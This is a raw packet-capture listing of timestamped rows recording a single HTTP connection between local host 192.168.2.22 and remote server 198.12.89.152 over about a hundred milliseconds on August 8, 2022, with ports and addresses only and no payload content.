Aug 8, 2022 17:26:51.607762098 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607768059 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607778072 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607784033 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607793093 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607799053 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607810020 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607814074 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607825994 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607830048 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607839108 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607845068 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607851982 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607861042 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607870102 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607877016 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607883930 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607892036 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607908010 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607912064 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607923031 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607929945 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607939959 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607944965 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607954979 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607961893 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607970953 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607979059 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607985973 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607996941 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608002901 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.608011961 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608020067 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.608026028 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608042955 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608069897 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608628035 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608838081 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.608860016 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.608880043 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.608897924 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.608903885 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608932018 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608947992 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.608957052 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609008074 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609014988 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609051943 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609067917 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609071016 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609088898 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609088898 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609106064 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609106064 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609126091 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609127045 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609144926 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609146118 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609160900 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609167099 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609184027 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609184027 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609201908 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609201908 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609221935 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609221935 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609240055 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609241962 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609258890 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609262943 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609276056 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609283924 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609306097 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609323978 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609333992 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609338999 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609350920 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609355927 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609370947 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609371901 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609390020 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609390974 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609407902 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609411955 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609426022 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609427929 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609445095 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609447956 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609463930 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609466076 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609479904 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609483957 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609503984 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609508991 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609527111 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609532118 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609538078 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609543085 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609558105 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609560013 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609572887 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609577894 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609589100 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609595060 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609603882 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609611988 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609620094 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609628916 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609635115 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609644890 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609651089 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609667063 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609673023 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609682083 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609685898 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609698057 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609704018 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609714031 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609720945 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609729052 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.609736919 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609755993 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.609771967 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.611232042 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.611674070 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721035957 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721060991 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721077919 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721093893 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721110106 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721126080 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721142054 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721158028 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721174002 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721189976 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721206903 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721221924 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721225023 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721237898 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721256018 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721271992 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721288919 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721306086 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721323967 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721340895 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721355915 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721371889 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721386909 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721401930 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721417904 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721420050 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721436024 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721451998 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721470118 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721484900 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721502066 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721518993 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721534014 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721550941 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721566916 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721581936 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721599102 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721615076 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721628904 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721631050 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721649885 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721664906 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721697092 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721700907 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721714020 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721718073 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721729994 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721734047 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721745968 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721750021 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721762896 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.721766949 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721782923 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.721801043 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723483086 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723536968 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723545074 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723555088 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723570108 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723576069 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723586082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723591089 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723612070 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723625898 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723709106 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723723888 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723740101 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723745108 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723754883 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.723762989 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723781109 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723798990 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.723992109 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724014997 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724031925 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724034071 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724046946 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724052906 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724062920 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724070072 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724077940 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724087000 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724092960 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724103928 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724107981 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724122047 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724124908 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724138021 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724142075 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724158049 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724159002 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724173069 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724176884 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724189043 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724194050 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724205017 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724210024 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724220991 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724227905 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724236965 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724246025 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724251986 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724261999 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724281073 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724307060 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724323988 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724338055 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724339008 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724354982 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724356890 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724370003 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724383116 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724385977 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724401951 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724402905 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724416971 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724421978 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724433899 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724436998 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724448919 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724453926 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724463940 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724469900 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724481106 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724486113 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724495888 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724504948 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724512100 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724523067 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724539995 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724592924 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724622965 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724637032 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724721909 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724766970 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724896908 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724916935 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724931002 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724937916 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724950075 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724953890 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724965096 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724971056 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.724980116 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.724987984 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.725003958 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.725020885 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.725199938 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.725245953 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726707935 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726795912 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726823092 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726843119 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726859093 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726864100 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726875067 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726881027 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726891041 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726898909 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726906061 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726914883 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726921082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726933002 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726937056 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726949930 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726953030 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726968050 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726969957 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726983070 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.726988077 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.726999044 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727005005 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727015972 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727022886 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727031946 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727040052 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727046967 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727056026 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727062941 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727071047 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727092028 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727093935 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727108002 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727188110 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727205038 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727220058 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727226973 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727236032 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727241993 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727252960 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727261066 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727267981 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727276087 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727283955 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727292061 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727308035 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727324009 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727376938 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727392912 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727406979 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727417946 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727422953 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727432966 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727437019 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727452993 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727453947 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727473974 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727489948 CEST	49179	80	192.168.2.22	198.12.89.152
